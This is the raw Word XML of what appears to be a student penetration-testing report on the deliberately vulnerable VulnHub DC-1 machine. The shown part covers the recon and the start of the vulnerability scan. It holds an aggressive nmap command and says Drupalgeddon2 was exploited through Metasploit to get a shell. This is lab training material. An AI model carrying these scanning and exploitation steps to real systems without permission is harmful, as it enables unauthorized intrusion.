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CCAA" w14:textId="01AA410E" w:rsidR="00DF458E" w:rsidRPr="00DF458E" w:rsidRDefault="00DF458E" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF458E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Capstone Project – Full VAPT Cycle Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626BACB1" w14:textId="77777777" w:rsidR="00DF458E" w:rsidRDefault="00DF458E" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E61B8A8" w14:textId="183272D2" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>VulnHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t xml:space="preserve"> DC-1 (Drupal – Drupalgeddon2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tester:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:t xml:space="preserve"> Prakanth</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacking Machine:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:t xml:space="preserve"> Kali Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target IP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:t xml:space="preserve"> 192.168.56.102</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacker IP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:t xml:space="preserve"> 192.168.56.101</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:t xml:space="preserve"> 16-Jan-2026</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools Used:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE33A9">
        <w:t xml:space="preserve"> Nmap, Metasploit Framework, OpenVAS, Web Browser (Firefox)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F5ED2F" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00000000" w:rsidP="00FE33A9">
      <w:r>
        <w:pict w14:anchorId="5EFEC408">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="269900FD" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C7A660" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>This penetration testing engagement simulated a full Vulnerability Assessment and Penetration Testing (VAPT) cycle against a vulnerable Drupal-based virtual machine (DC-1). The objective was to identify security weaknesses, exploit confirmed vulnerabilities, and assess the overall security posture of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4446A11E" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>During the assessment, multiple open services were discovered, including SSH, HTTP, and RPC. The web application was identified as running an outdated Drupal version vulnerable to Drupalgeddon2 (CVE-2018-7600), which allows unauthenticated remote code execution. Successful exploitation was achieved using Metasploit, resulting in a Meterpreter session with www-data privileges. The findings demonstrate a critical security risk that could allow attackers to fully compromise the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649FD97B" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00000000" w:rsidP="00FE33A9">
      <w:r>
        <w:pict w14:anchorId="6EB35127">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63673EDD" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Scope &amp; Methodology (PTES)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE395CE" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>The engagement followed the PTES framework:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F6BA6E" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Pre-engagement Interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5AE973" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Intelligence Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBAB24C" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t xml:space="preserve">Threat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Modeling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E56FF6E" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A91CF11" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C18A2F" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DED9BB" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0553BEAB" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00000000" w:rsidP="00FE33A9">
      <w:r>
        <w:pict w14:anchorId="703D34BC">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C65087" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Intelligence Gathering &amp; Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0C43E6" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 Network Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5095CE4F" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>ARP scanning revealed three active hosts in the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E187B00" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Discovered Target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3381B9" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>192.168.56.102 – DC-1 (Drupal VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F045E10" w14:textId="7859A523" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BAC1F08" wp14:editId="2CA8C27B">
            <wp:extent cx="5731510" cy="3082290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="852882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82200" name="Picture 8528822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14:paraId="75996D11" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00000000" w:rsidP="00FE33A9">
      <w:r>
        <w:pict w14:anchorId="771CFBF7">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FA1C8A" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Port &amp; Service Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B259B3F" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>An aggressive Nmap scan was performed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC193CE" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t xml:space="preserve"> -A 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09503076" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">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880"/>
        <w:gridCol w:w="1722"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w14:paraId="48593897" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="645FE48C" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE33A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DCFCC37" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE33A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37DA2F66" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE33A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w14:paraId="2B96BAF1" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21DCDF36" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="316BD2BD" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10807860" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>OpenSSH 6.0p1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w14:paraId="184C322C" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="508E6EA4" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0337612C" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E97956B" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>Apache 2.2.22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w14:paraId="6FAF5762" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E2D759C" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>111</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7105C147" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>RPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04D4B84F" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FE33A9">
              <w:t>rpcbind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34B83CA5" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>The HTTP service revealed a Drupal CMS installation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFB4B1A" w14:textId="0711F3BE" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56C07AB1" wp14:editId="1B9CCCF7">
            <wp:extent cx="5731510" cy="3049270"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1822512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12828" name="Picture 18225128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357CF106" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00000000" w:rsidP="00FE33A9">
      <w:r>
        <w:pict w14:anchorId="2DFB33AF">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15373F16" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Vulnerability Analysis (OpenVAS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037BE28C" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>An OpenVAS scan was conducted against the target IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AEC723" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OpenVAS Findings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676"/>
        <w:gridCol w:w="2646"/>
        <w:gridCol w:w="946"/>
        <w:gridCol w:w="2036"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w14:paraId="1D0C762D" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="461A5EFC" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE33A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CBAB825" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE33A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Target IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2237520A" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE33A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F530101" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE33A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E5A661E" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE33A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>PTES Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w14:paraId="233D7FDD" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="021E57C5" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>2026-01-16 02:45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
